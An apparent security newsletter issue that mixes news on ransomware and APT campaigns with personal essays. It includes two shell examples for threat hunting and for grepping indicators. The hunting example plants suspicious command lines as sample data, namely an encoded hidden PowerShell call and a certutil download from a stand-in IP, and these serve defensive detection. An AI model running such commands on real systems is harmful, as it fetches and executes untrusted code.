Unsupervised Learning Newsletter NO. 348

News & Analysis

Spearmishing, Patreon Security, and Triple-Threat Ransomware
🗞️ NO. 348 | SEP 12 2022

Let's have a fantastic week.


Patreon Security
Patreon laid off its security team last week, and a former privacy engineer there, Emily Metcalfe, said she wouldn't trust her data with them. Big yikes. Patreon responded that only five people were laid off and that the majority of security personnel remain in place, but another anonymous internal report said there was nobody left qualified to run the tools. Regardless of how bad it actually is (which only people inside know), you can be sure something is amiss when security people are willing to publicly shit-talk you on the internet after being let go. MORE

Not Just Ransomware
The LockBit ransomware group is combining extortion tactics to go after victims. We all know ransomware groups encrypt files and demand money to decrypt them: that's tactic 1. They also threaten to release the data they stole before encrypting it: that's tactic 2. And now they're adding DDoS to the mix: tactic 3. So LockBit (and other groups are combining tactics the same way) can stop you from using your data, threaten to embarrass you and create a PR incident, and/or prevent your customers from reaching you. MORE

There's a new attack technique where new employees at a company get hit with a malicious text message that says something like, "Hey, I'm the CEO of $YOURNEWCOMPANY and I need you to do X for me…" Remember, it's easy to find your phone number on various websites, so as soon as you're associated with a company on LinkedIn you can be targeted. MORE | ANALYSIS BY RACHEL TOBAC


🔭 Benchmark your cloud configuration in minutes with JupiterOne

See how your configuration compares against CIS Foundations benchmarks in just a few clicks. Once integrated with your cloud platform, JupiterOne automatically benchmarks your configuration against CIS best practices, giving you greater understanding of how to improve your configuration and security posture.

NOTE: I just built the Vulnerability Management program at Robinhood using JupiterOne, and it's seriously my top recommendation for any company getting into Attack Surface Management, Asset Management, or Vulnerability Management.

NK Energy Attacks
North Korean APT Lazarus leveraged the Log4j vulnerability in VMware Horizon to attack the corporate networks of energy companies in the US, Canada, and Japan. Once in, they used a RAT called MagicRAT to search for and steal data from systems on the network. MORE | MAGICRAT ANALYSIS

Axie Recovery
The US has recovered $30 million stolen from Axie Infinity by North Korea's Lazarus group. Leveraging blockchain analysis expertise from Chainalysis and the FBI, law enforcement was able to seize the funds at cashout (not from the blockchain itself). This is yet another reminder that the blockchain doesn't just leave crumbs; it's a crumb-leaving technology, and criminals are most vulnerable at the cashout step. MORE

Government Takedowns?
Cloudflare has clarified why they considered Kiwi Farms so dangerous, and they're calling for governments to determine takedown criteria themselves instead of relying on tech companies to do it for them. I think that makes sense, but in cases like Kiwi Farms it was obvious this was way over the line. It'd be nice to have both, but when government is too slow why not just do the right thing yourself? MORE

Oath Keeper Penetration
The Anti-Defamation League's Center on Extremism (COE) published a report this week on the Oath Keepers, an organization whose stated purpose includes getting more members into positions of influence within law enforcement and government. Specifically, the research shows how many known members are actually police officers, serve in the military, or hold or are running for public office. MORE | THE COE REPORT

Phosphorus APT
Microsoft is warning about Iranian APT group Phosphorus, which is known for quickly adopting new vulnerabilities into its toolchain. They say the main workflow is to look for internet-facing systems with known Exchange, Fortinet, or Log4j flaws, use those to get in, scan the network and collect credentials, and then establish persistence using scheduled tasks. From there they've been seen demanding an $8,000 ransom about two days after digging in. MORE


  • 🪳 HIGH Cisco releases patches for multiple vulnerabilities. MORE


5G Internet
T-Mobile is rolling out 5G internet in 64 cities in the Northeastern US, including NYC, Boston, and Philadelphia. Somewhat related fun fact: I have 5G+ AT&T in my town and when I'm at the bank I consistently get over 650Mbit/second download speeds. That's mobile speed, not wireless, and it's almost as fast as my gigabit wired ethernet at home. MORE

Entangled Clocks
We've entangled two atomic clocks for the first time. MORE


Finland Energy
Finland's use of wind and nuclear will bring them to energy self-sufficiency within 1-2 years. MORE

Astronaut Mutations
Scientists have found mutations in the blood of 14 NASA astronauts who flew Space Shuttle missions between 1998 and 2001. Astronauts are exposed to far more radiation than the rest of us because they spend so long outside the protection of Earth's atmosphere. MORE

SF Psychedelics
San Francisco has unanimously decriminalized psychedelics like psilocybin and ayahuasca, making them the 'lowest priorities' for law enforcement. Seems like a formality, though, given how little prosecution there is for much harder drugs. MORE


There Are No Pilots
Evidently, a significant part of airline delays today is due to a lack of pilots. This seems to be exacerbated by pilots being laid off during the pandemic combined with the military training fewer pilots because they're moving to drones. Combine those and you have a massive pipeline problem, and it struck me that the US (and much of the world) seems to have pipeline problems in many fields. Cybersecurity comes to mind. I think a big part of it is that it's not clear whose problem it is. Secondary schools? Universities? Industry? Probably all of the above, but if it's everyone's problem it's nobody's problem. The West seems to have lots of these shared investment problems right now. Entities are too short-term focused and/or angry at the other guy to want to support programs that require investment now to see shared benefit in the future. Meanwhile, China can throw up a 10-story building like a hotdog stand. MORE

Working vs. Working Hard
I'm intensely curious about the conjoined phenomenon around The Great Resignation, Quiet Quitting, and companies going after passive workers. We see this with Back to Office policies as well, where managers can't wait to get people back into an office where they can see them. I find this interesting because I think two things are happening at once. First, I think many companies are so broken that they can't clearly articulate what they're doing. They don't have a clear mission, they can't articulate their goals, and they definitely can't articulate how a given employee's work is helping with those. So it sucks to work there. Now add pandemics, remote work, and rising depression overall, and you have a lot of checked-out employees. Then, on the other hand, you also have a lot of people who look good on paper but who either aren't able or aren't willing to put in work, so they're using all these truths as an excuse to phone it in. So we have two simultaneous realities: crappy work that people should quit, and crappy employees that should be fired. From the business perspective, I think it should be ok to demand employees that are 100% energetic and committed. And to filter for that, both before and after hiring. But at the same time I think, from a market perspective, it makes a company more attractive if they can articulate their vision and story. Not just during onboarding, but constantly. It's a hard time for companies right now. You have to be fluffy enough to be attractive, but they're learning that being too accommodating attracts and retains the wrong kind of people.


We have two Steven Pressfield books assigned for this month's bookclub, but I read like 5 of them. They're short. My absolute favorite so far, besides The War of Art, which I think was the original, was Do The Work. Highly recommended. Read War of Art first, then Do The Work, then Put Your Ass Where Your Heart Wants to Be. GET THE BOOKS

It's Apple Religion season, which means I'll be camping soon. This time it'll be for two Friday mornings in a row: this coming Friday for the iPhone 14 Pro, and next Friday for the Apple Watch Ultra and the new AirPods Pro 2. I'm most excited by the Ultra watch, actually. I'm not just an Apple guy, but also a watch guy, so I'm really happy with how chunky this one looks, plus the larger, completely flat face! I don't have much religion in my life, so Apple is my replacement for that. I camped for the iPhone in 2007 and haven't missed a launch since! If anyone wants to come make fun of me I'll probably be at my go-to, which is the Burlingame store.

I'm combining the free and member newsletters into a single edition for the time being, and using Mailchimp's Dynamic Content to create content sections that only UL members can see. Creating two versions actually takes significant time and effort, and with this just being me for now I'd rather spend that time on the content itself. Dynamic Content is a decent hybrid, but hopefully with the big UL changes coming soon I'll be able to break those out again, plus have more than just the News & Analysis episode going out to members every week! Cannot wait.

I am building a mobile app around Eudaimonia. Will start a thread about it in UL Slack if anyone is interested in discussing. I have most of the backend logic already built, as well as mockups, and am close to starting developer selection. Let me know if you know any great mobile dev shops that are good with health apps with a major focus on design and aesthetics.

I tweeted out that I got my Omicron booster shot (and flu shot) and got immediately targeted by a disinformation nutjob. What kind exactly? These folks don't just believe Covid is a hoax. That would be too mainstream. No, they believe that all viruses are a hoax. These are doctors, or at least they have significant medical training, and they don't believe in viruses. This was a potent reminder that batshit ideas can easily override any previous logic, education, or training in a vulnerable mind. Don't think knowledge protects people, including yourself.


⚙️ THREAT HUNTING | Sandbox Scryer (⭐️ 60)
An open-source tool for producing threat hunting and intelligence data from public sandbox detonation output. It leverages the MITRE ATT&CK framework to organize and prioritize findings, assisting in the assembly of IOCs, understanding attack movement, and hunting for threats. TOOL | by Hybrid Analysis

📔 DETECTION ENGINEERING | Threat Hunting Based on Zipf's Law
A brilliant application of Zipf's law, which is normally used in NLP applications, to find anomalies in security-related events. BLOG | by Dmitrijs Trizna
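Here's the shape of that idea in a few lines of shell, as an added example of mine rather than anything from Dmitrijs's post: a rank-frequency (stack-count) view of process command lines across a small fleet. Zipf's law predicts that a couple of commands will dominate and most will appear once or twice, so the singletons at the rare end of the table are where the hunt starts. The host/command events are constructed for the demo, and the powershell and certutil lines are the planted oddities.

```shell
#!/bin/sh
# Added example (mine, not code from the linked post): a rank-frequency
# "stack count" of process command lines across a small fleet. Under a
# Zipf-like distribution a few commands dominate and most appear once;
# the singletons are the hunting leads. EVENTS is constructed for the demo:
# "<host> <command line>", one per line.

EVENTS='ws01 svchost.exe -k netsvcs
ws02 svchost.exe -k netsvcs
ws03 svchost.exe -k netsvcs
ws04 svchost.exe -k netsvcs
ws05 svchost.exe -k netsvcs
ws01 chrome.exe --type=renderer
ws02 chrome.exe --type=renderer
ws03 chrome.exe --type=renderer
ws04 outlook.exe
ws05 outlook.exe
ws03 powershell.exe -nop -w hidden -enc SQBFAFgA
ws04 certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.txt'

# Frequency table "<count> <command line>", rarest first (the long tail
# at the top, the head of the distribution at the bottom).
rank_frequency() {
    printf '%s\n' "$EVENTS" | cut -d' ' -f2- | sort | uniq -c | sort -n
}

# Hunting leads: command lines seen at most N times (default 1) fleet-wide.
rare_commands() {
    max=${1:-1}
    rank_frequency | awk -v max="$max" '$1 <= max { $1 = ""; sub(/^ /, ""); print }'
}

# Share of all events taken by the N most common command lines, as an
# integer percent. A steep head (a few commands covering most volume) is
# what makes the tail small enough to review by hand.
head_share_percent() {
    n=${1:-1}
    rank_frequency | awk -v n="$n" '
        { count[NR] = $1; total += $1 }
        END {
            for (i = NR; i > NR - n && i > 0; i--) top += count[i]
            printf "%d\n", 100 * top / total
        }'
}

rank_frequency
rare_commands 1       # the powershell and certutil one-offs
head_share_percent 2  # 66 (8 of 12 events are svchost or chrome)
```

Rarity isn't malice: a one-off command line on a developer workstation is normal, so run this per fleet or per role, normalize away the noisy parts of the command line (temp file names, session IDs) before counting, and treat the tail as leads rather than alerts.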

🔭 Benchmark your cloud configuration in minutes with JupiterOne [Sponsor] — See how your configuration compares against CIS Foundations benchmarks in just a few clicks. NOTE: JupiterOne is the no-joke centerpiece of the security program I built at work, and I can't recommend it enough. Ping me if you want to have your ear talked off about it. START WITH A FREE ACCOUNT

Hedonic vs. Eudaimonic Happiness
A good articulation of the two primary types of happiness that people pursue and confuse. MORE

How to Draw Anything
Someone used Stable Diffusion to go from a 10-year-old's crude art concept to a hyper-realistic sci-fi scene. A stunning example of combining a human idea with AI to create a final art product. TUTORIAL

Just Grep
The GNU grep team is telling us to stop using egrep and fgrep. As of GNU grep 3.8 they're deprecated wrapper scripts that print a warning, and the functionality has been built into grep for years: use grep -E (extended regex) and grep -F (fixed strings) respectively. The distinction matters more than it looks for security work: -F treats the pattern as a literal, so the dots in an IP, hash, or hostname you paste in won't quietly match any character. MORE
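As an added example (mine, not from the GNU grep project), here's the practical difference over some constructed DNS log lines, using an indicator that contains dots:

```shell
#!/bin/sh
# Added example (not from the newsletter or the GNU grep project):
# grep -E (formerly egrep) vs grep -F (formerly fgrep) on an indicator
# that contains regex metacharacters. Log lines are constructed for the demo.

LOG='2022-09-12T10:00:01Z dns query=evil.example.com client=10.0.0.4
2022-09-12T10:00:02Z dns query=evil-example.com client=10.0.0.9
2022-09-12T10:00:03Z dns query=mail.example.com client=10.0.0.4
2022-09-12T10:00:04Z dns query=evil.example.com client=10.0.0.12'

# The indicator as it would be pasted straight out of a threat report.
IOC='evil.example.com'

# Count matches treating the IOC as an extended regex (egrep behaviour):
# every "." matches any character, so "evil-example.com" matches too.
hits_regex() {
    printf '%s\n' "$LOG" | grep -E -c "$IOC"
}

# Count matches treating the IOC as a fixed string (fgrep behaviour):
# the dots are literal, so only the real indicator matches.
hits_fixed() {
    printf '%s\n' "$LOG" | grep -F -c "$IOC"
}

# Lines the regex form reports that the fixed-string form does not:
# the false positives an unescaped pattern would have produced.
false_positives() {
    printf '%s\n' "$LOG" | grep -E "$IOC" | grep -F -v "$IOC"
}

# When you do want a regex (alternation of several indicators), use -E
# and escape the metacharacters in each literal.
hits_either() {
    printf '%s\n' "$LOG" | grep -E -c 'evil\.example\.com|mail\.example\.com'
}

hits_regex      # 3
hits_fixed      # 2
false_positives # the evil-example.com line
hits_either     # 3
```

Use -F for pasted indicators (and -f file for a whole list of them), and reach for -E only when you actually need alternation or repetition, escaping the dots in your literals when you do.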

So You Want to Be a Writer
If it doesn't come bursting out of you, don't do it? MORE

OSCP Tips and Tricks MORE

The most regretted (and lowest paying) college majors. MORE

Really looking forward to this Amazon series The Peripheral, based on William Gibson's book. TRAILER

Vulnerability Management for Go MORE


If you're a creative person who struggles with starting and finishing projects, read Do The Work, by Steven Pressfield. GET THE BOOK


"Be cautious, because research can easily become Resistance to getting real work done."

Steven Pressfield